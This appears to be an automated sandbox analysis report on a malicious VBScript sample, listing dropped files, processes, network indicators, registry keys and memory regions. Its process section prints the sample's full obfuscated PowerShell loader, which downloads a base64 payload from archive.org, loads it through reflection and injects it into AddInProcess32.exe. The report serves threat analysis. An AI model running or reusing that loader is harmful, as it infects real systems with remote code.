Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
vr65co3Boo.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anttd1xw.vy5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3v0lstm.sb5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa5ysdpk.0oi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrchnfcv.p12.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\vr65co3Boo.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+'
= (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent =
'+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type
= 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+',
[object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/AaTNM/0
|
188.114.97.3
|
|
|
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
148.113.165.11
|
unknown
|
United States
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
156EB570000
|
trusted library section
|
page read and write
|
|
|
|
156E3597000
|
trusted library allocation
|
page read and write
|
|
|
|
156D35A4000
|
trusted library allocation
|
page read and write
|
|
|
|
2811000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
1D7AF320000
|
heap
|
page read and write
|
||
|
156D0EF0000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1D7C97A0000
|
heap
|
page read and write
|
||
|
1D7B0C90000
|
heap
|
page readonly
|
||
|
1D7AF36A000
|
heap
|
page read and write
|
||
|
24B35BF000
|
stack
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
285B000
|
trusted library allocation
|
page read and write
|
||
|
2AC1A3E000
|
stack
|
page read and write
|
||
|
156EB236000
|
heap
|
page read and write
|
||
|
2700000
|
heap
|
page read and write
|
||
|
7FF848CA4000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9592000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
23CC3E9F000
|
heap
|
page read and write
|
||
|
156D2E28000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
5D8C000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
3817000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E62000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E9F000
|
heap
|
page read and write
|
||
|
156D1023000
|
heap
|
page read and write
|
||
|
284D000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9550000
|
heap
|
page read and write
|
||
|
23CC245E000
|
heap
|
page read and write
|
||
|
23CC2448000
|
heap
|
page read and write
|
||
|
156EAFBE000
|
heap
|
page read and write
|
||
|
23CC24CB000
|
heap
|
page read and write
|
||
|
7FF848E71000
|
trusted library allocation
|
page read and write
|
||
|
4E29000
|
heap
|
page read and write
|
||
|
156D4B6E000
|
trusted library allocation
|
page read and write
|
||
|
1D7B1382000
|
trusted library allocation
|
page read and write
|
||
|
156D11A7000
|
heap
|
page execute and read and write
|
||
|
1D7B143E000
|
trusted library allocation
|
page read and write
|
||
|
156D0FAB000
|
heap
|
page read and write
|
||
|
23CC244E000
|
heap
|
page read and write
|
||
|
156D0F10000
|
heap
|
page read and write
|
||
|
23CC24DD000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9413000
|
heap
|
page read and write
|
||
|
24B32FE000
|
stack
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
23CC24CB000
|
heap
|
page read and write
|
||
|
28A7000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF420000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
156D1025000
|
heap
|
page read and write
|
||
|
156E2F81000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E4E000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
28A5000
|
trusted library allocation
|
page read and write
|
||
|
D3F01FF000
|
stack
|
page read and write
|
||
|
D3F03FF000
|
stack
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page read and write
|
||
|
286B000
|
trusted library allocation
|
page read and write
|
||
|
156D0FE4000
|
heap
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
50CD000
|
stack
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1D7B1479000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D86000
|
trusted library allocation
|
page execute and read and write
|
||
|
156D45B1000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF3AD000
|
heap
|
page read and write
|
||
|
23CC2504000
|
heap
|
page read and write
|
||
|
D3EFFFD000
|
stack
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
23CC249F000
|
heap
|
page read and write
|
||
|
23CC3E26000
|
heap
|
page read and write
|
||
|
7FF848E7A000
|
trusted library allocation
|
page read and write
|
||
|
9DB000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
7FF848DA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C0000
|
trusted library allocation
|
page read and write
|
||
|
1D7B1427000
|
trusted library allocation
|
page read and write
|
||
|
2AC193D000
|
stack
|
page read and write
|
||
|
7DF48E4B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
156EB22B000
|
heap
|
page read and write
|
||
|
9AE000
|
stack
|
page read and write
|
||
|
23CC24DD000
|
heap
|
page read and write
|
||
|
156EB21F000
|
heap
|
page read and write
|
||
|
25F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2879000
|
trusted library allocation
|
page read and write
|
||
|
156D0EE0000
|
heap
|
page read and write
|
||
|
25CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2861000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1D7B12C0000
|
heap
|
page execute and read and write
|
||
|
56D5000
|
trusted library allocation
|
page read and write
|
||
|
2AC167E000
|
stack
|
page read and write
|
||
|
DD6000
|
heap
|
page read and write
|
||
|
23CC2478000
|
heap
|
page read and write
|
||
|
289C000
|
trusted library allocation
|
page read and write
|
||
|
23CC22A0000
|
heap
|
page read and write
|
||
|
7FF848D76000
|
trusted library allocation
|
page read and write
|
||
|
156D2D10000
|
trusted library allocation
|
page read and write
|
||
|
24B363F000
|
stack
|
page read and write
|
||
|
156D4633000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E57000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
156E3F97000
|
trusted library allocation
|
page read and write
|
||
|
288A000
|
trusted library allocation
|
page read and write
|
||
|
156D339F000
|
trusted library allocation
|
page read and write
|
||
|
1D7C132F000
|
trusted library allocation
|
page read and write
|
||
|
56F0000
|
trusted library allocation
|
page read and write
|
||
|
1D7B0DFA000
|
heap
|
page read and write
|
||
|
23CC24D2000
|
heap
|
page read and write
|
||
|
4DFB000
|
heap
|
page read and write
|
||
|
1D7B147F000
|
trusted library allocation
|
page read and write
|
||
|
23CC2670000
|
heap
|
page read and write
|
||
|
23CC24CB000
|
heap
|
page read and write
|
||
|
1D7C93AE000
|
heap
|
page read and write
|
||
|
2AC15FC000
|
stack
|
page read and write
|
||
|
24B2D63000
|
stack
|
page read and write
|
||
|
2AC177F000
|
stack
|
page read and write
|
||
|
23CC3E2A000
|
heap
|
page read and write
|
||
|
1D7C9324000
|
heap
|
page read and write
|
||
|
156D464C000
|
trusted library allocation
|
page read and write
|
||
|
156D102F000
|
heap
|
page read and write
|
||
|
156D11F4000
|
heap
|
page read and write
|
||
|
D3EF9FE000
|
stack
|
page read and write
|
||
|
25B0000
|
trusted library allocation
|
page read and write
|
||
|
A8E000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
24B33BE000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D7B1441000
|
trusted library allocation
|
page read and write
|
||
|
5920000
|
heap
|
page read and write
|
||
|
156D1180000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E22000
|
heap
|
page read and write
|
||
|
1D7C93AC000
|
heap
|
page read and write
|
||
|
643E000
|
stack
|
page read and write
|
||
|
4DA3000
|
heap
|
page read and write
|
||
|
D3EFCFE000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
23CC24D1000
|
heap
|
page read and write
|
||
|
286D000
|
trusted library allocation
|
page read and write
|
||
|
24B3379000
|
stack
|
page read and write
|
||
|
5588000
|
heap
|
page read and write
|
||
|
24B327E000
|
stack
|
page read and write
|
||
|
23CC2428000
|
heap
|
page read and write
|
||
|
4E0F000
|
heap
|
page read and write
|
||
|
7FF848E82000
|
trusted library allocation
|
page read and write
|
||
|
24B37BB000
|
stack
|
page read and write
|
||
|
1D7AF380000
|
heap
|
page read and write
|
||
|
1D7AF495000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
280E000
|
stack
|
page read and write
|
||
|
23CC24FA000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
23CC2478000
|
heap
|
page read and write
|
||
|
23CC3E46000
|
heap
|
page read and write
|
||
|
1D7B13B2000
|
trusted library allocation
|
page read and write
|
||
|
1D7B17E7000
|
trusted library allocation
|
page read and write
|
||
|
2593000
|
trusted library allocation
|
page execute and read and write
|
||
|
289F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E5A000
|
trusted library allocation
|
page read and write
|
||
|
56E9000
|
trusted library allocation
|
page read and write
|
||
|
156D465D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AC1173000
|
stack
|
page read and write
|
||
|
284A000
|
trusted library allocation
|
page read and write
|
||
|
156D1224000
|
heap
|
page read and write
|
||
|
23CC3E22000
|
heap
|
page read and write
|
||
|
24B30FE000
|
stack
|
page read and write
|
||
|
156D33C7000
|
trusted library allocation
|
page read and write
|
||
|
4D73000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9E7000
|
heap
|
page read and write
|
||
|
4C90000
|
heap
|
page read and write
|
||
|
286F000
|
trusted library allocation
|
page read and write
|
||
|
156D2E10000
|
heap
|
page read and write
|
||
|
24B353E000
|
stack
|
page read and write
|
||
|
156D35F7000
|
trusted library allocation
|
page read and write
|
||
|
1D7B143B000
|
trusted library allocation
|
page read and write
|
||
|
23CC245D000
|
heap
|
page read and write
|
||
|
930000
|
heap
|
page read and write
|
||
|
24B317D000
|
stack
|
page read and write
|
||
|
156D357E000
|
trusted library allocation
|
page read and write
|
||
|
1D7C93FF000
|
heap
|
page read and write
|
||
|
23CC23A0000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
D3EF8FA000
|
stack
|
page read and write
|
||
|
156D4659000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E2A000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9564000
|
heap
|
page read and write
|
||
|
7FF849011000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF3A9000
|
heap
|
page read and write
|
||
|
1D7B192A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848CAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
7FF848CA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
156D2F70000
|
heap
|
page execute and read and write
|
||
|
23CC3E42000
|
heap
|
page read and write
|
||
|
5BCC000
|
stack
|
page read and write
|
||
|
24B36BE000
|
stack
|
page read and write
|
||
|
1D7B142D000
|
trusted library allocation
|
page read and write
|
||
|
156D0FA9000
|
heap
|
page read and write
|
||
|
2AC17F9000
|
stack
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
156D3001000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
25A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA2000
|
trusted library allocation
|
page read and write
|
||
|
2658000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
156D1130000
|
heap
|
page read and write
|
||
|
1D7C9320000
|
heap
|
page read and write
|
||
|
7FF849033000
|
trusted library allocation
|
page read and write
|
||
|
9B8000
|
heap
|
page read and write
|
||
|
1D7B142A000
|
trusted library allocation
|
page read and write
|
||
|
1D7B1608000
|
trusted library allocation
|
page read and write
|
||
|
23CC249F000
|
heap
|
page read and write
|
||
|
23CC3EA0000
|
heap
|
page read and write
|
||
|
7FF848E51000
|
trusted library allocation
|
page read and write
|
||
|
156D3371000
|
trusted library allocation
|
page read and write
|
||
|
56C9000
|
trusted library allocation
|
page read and write
|
||
|
23CC24FA000
|
heap
|
page read and write
|
||
|
494D000
|
stack
|
page read and write
|
||
|
23CC3E9F000
|
heap
|
page read and write
|
||
|
156D2DE0000
|
heap
|
page execute and read and write
|
||
|
7FB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
|
156D0FBD000
|
heap
|
page read and write
|
||
|
23CC3E26000
|
heap
|
page read and write
|
||
|
156D0F60000
|
heap
|
page read and write
|
||
|
1D7B1444000
|
trusted library allocation
|
page read and write
|
||
|
156EB110000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
156D4681000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
23CC24D3000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
1D7B1851000
|
trusted library allocation
|
page read and write
|
||
|
1D7B0C80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CA2000
|
trusted library allocation
|
page read and write
|
||
|
1D7B0DF0000
|
heap
|
page read and write
|
||
|
23CC3E23000
|
heap
|
page read and write
|
||
|
56EB000
|
trusted library allocation
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CC24E0000
|
heap
|
page read and write
|
||
|
4E24000
|
heap
|
page read and write
|
||
|
23CC43D5000
|
heap
|
page read and write
|
||
|
8F9000
|
stack
|
page read and write
|
||
|
2874000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF3A7000
|
heap
|
page read and write
|
||
|
2AC16FF000
|
stack
|
page read and write
|
||
|
23CC2448000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
156D31A2000
|
trusted library allocation
|
page read and write
|
||
|
2853000
|
trusted library allocation
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
23CC43F4000
|
heap
|
page read and write
|
||
|
156EB420000
|
heap
|
page read and write
|
||
|
23CC3F80000
|
heap
|
page read and write
|
||
|
56A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
24B31FF000
|
stack
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
1D7B12E0000
|
heap
|
page execute and read and write
|
||
|
1D7B1310000
|
heap
|
page read and write
|
||
|
1D7AF360000
|
heap
|
page read and write
|
||
|
25C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CC24DE000
|
heap
|
page read and write
|
||
|
156D11F6000
|
heap
|
page read and write
|
||
|
285F000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF490000
|
heap
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D7AF3F5000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
D3F00FE000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
156D1160000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E5E000
|
heap
|
page read and write
|
||
|
23CC3E2D000
|
heap
|
page read and write
|
||
|
508D000
|
stack
|
page read and write
|
||
|
156D335C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F8E000
|
stack
|
page read and write
|
||
|
4CC7000
|
trusted library allocation
|
page read and write
|
||
|
23CC2504000
|
heap
|
page read and write
|
||
|
156D11A0000
|
heap
|
page execute and read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
51CE000
|
stack
|
page read and write
|
||
|
7FF848D5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
156EB202000
|
heap
|
page read and write
|
||
|
647C000
|
stack
|
page read and write
|
||
|
5AC000
|
stack
|
page read and write
|
||
|
23CC3E64000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E2A000
|
heap
|
page read and write
|
||
|
1D7B1343000
|
trusted library allocation
|
page read and write
|
||
|
156D3368000
|
trusted library allocation
|
page read and write
|
||
|
23CC2420000
|
heap
|
page read and write
|
||
|
156D4893000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1D7C93DA000
|
heap
|
page read and write
|
||
|
156E3277000
|
trusted library allocation
|
page read and write
|
||
|
24B373E000
|
stack
|
page read and write
|
||
|
1D7AF417000
|
heap
|
page read and write
|
||
|
7FF848CC2000
|
trusted library allocation
|
page read and write
|
||
|
2AC19BB000
|
stack
|
page read and write
|
||
|
58DE000
|
stack
|
page read and write
|
||
|
23CC24DA000
|
heap
|
page read and write
|
||
|
23CC3E36000
|
heap
|
page read and write
|
||
|
2AC1BBE000
|
stack
|
page read and write
|
||
|
4E18000
|
heap
|
page read and write
|
||
|
2869000
|
trusted library allocation
|
page read and write
|
||
|
1D7C93E7000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
156EB1F0000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page execute and read and write
|
||
|
156D2D40000
|
trusted library allocation
|
page read and write
|
||
|
156D0F7E000
|
heap
|
page read and write
|
||
|
156D0F9D000
|
heap
|
page read and write
|
||
|
23CC3E3C000
|
heap
|
page read and write
|
||
|
23CC3E22000
|
heap
|
page read and write
|
||
|
156EB23A000
|
heap
|
page read and write
|
||
|
156EB253000
|
heap
|
page read and write
|
||
|
23CC2485000
|
heap
|
page read and write
|
||
|
156D0F72000
|
heap
|
page read and write
|
||
|
4E08000
|
heap
|
page read and write
|
||
|
557E000
|
heap
|
page read and write
|
||
|
1D7B166E000
|
trusted library allocation
|
page read and write
|
||
|
23CC2504000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E20000
|
heap
|
page read and write
|
||
|
23CC2447000
|
heap
|
page read and write
|
||
|
23CC2380000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9470000
|
heap
|
page read and write
|
||
|
23CC2478000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
156D1190000
|
heap
|
page readonly
|
||
|
156D0FA5000
|
heap
|
page read and write
|
||
|
1D7B0C60000
|
trusted library allocation
|
page read and write
|
||
|
1D7B0D77000
|
heap
|
page execute and read and write
|
||
|
D3EFDFF000
|
stack
|
page read and write
|
||
|
1D7B1321000
|
trusted library allocation
|
page read and write
|
||
|
